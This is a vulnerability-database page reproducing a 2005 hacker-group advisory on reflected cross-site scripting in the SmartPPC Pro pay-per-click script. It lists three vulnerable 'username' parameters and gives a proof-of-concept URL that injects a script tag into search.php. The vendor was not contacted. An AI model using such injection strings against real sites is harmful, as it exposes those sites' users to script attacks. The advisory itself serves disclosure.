Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SmartPPCProXSS.txt

🗓️ 30 Nov 2005 00:00:00Reported by BiPi_HaCkType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

SmartPPC Pro Xss vulnerability discovered by Nightmare TeAmZ in 11/2005. Affected products listed with XSS vulnerable paths. No vendor contacted for a solutio

Code
`------------------------------------------------------  
Nightmare TeAmZ Advisory 017  
------------------------------------------------------  
Date - 11/2005  
SmartPPC Pro Xss  
  
  
AFFECTED PRODUCTS  
=================  
SmartPPC Pro  
http://www.orbitscripts.com  
  
  
Overview:  
========  
SmartPPC Standard is a full-featured Pay Per Click Search Engine with   
extended functionality. This script is easy enough for a novice to maintain   
but has the features and power suitable for PPC pros. SmartPPC is the   
solution for customers tired of the limitations of other PPC scripts, and   
customers tired of chasing down the bugs in their custom developed PPC   
search engines. This version has been sold for two years, and our customers   
have earned several million dollars using it. All known bugs were fixed   
during these two years. SmartPPC Standard runs from a different core than   
our popular SmartPPC Lite script. We'd like to emphasize the following   
important features:  
  
  
Xss Vulnerable Path:  
========  
/directory.php?username=[XSS]  
/frames.php?username=[XSS]  
/search.php?username=[XSS]  
  
Poof:  
========  
http://www.[Host].com/[Path]/search.php?keywords=1&username=--><script>alert('Hacked   
By Nightmare TeAmZ');</script>&alt_search=1&submitLuck=I%27m%20Was%20Hacked  
  
Solution:  
========  
1. Venditor Not Contacted  
  
  
Credits  
=======  
This vulnerability was discovered and researched by  
BiPi_HaCk of Nightmare TeAmZ  
We're: BiPi_HaCk - r3d_4Ss4ult3r - Sub_Z3r0  
Site: http://www.NightmareSecurity.net <--IT Security Forum  
  
_________________________________________________________________  
Personalizza MSN Messenger con sfondi e fotografie!   
http://www.ilovemessenger.msn.it/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Nov 2005 00:00Current
7.4High risk
Vulners AI Score7.4
nightmare teamzsmartppc proxss vulnerabilitynightmaresecurity.netvendor not contacted
36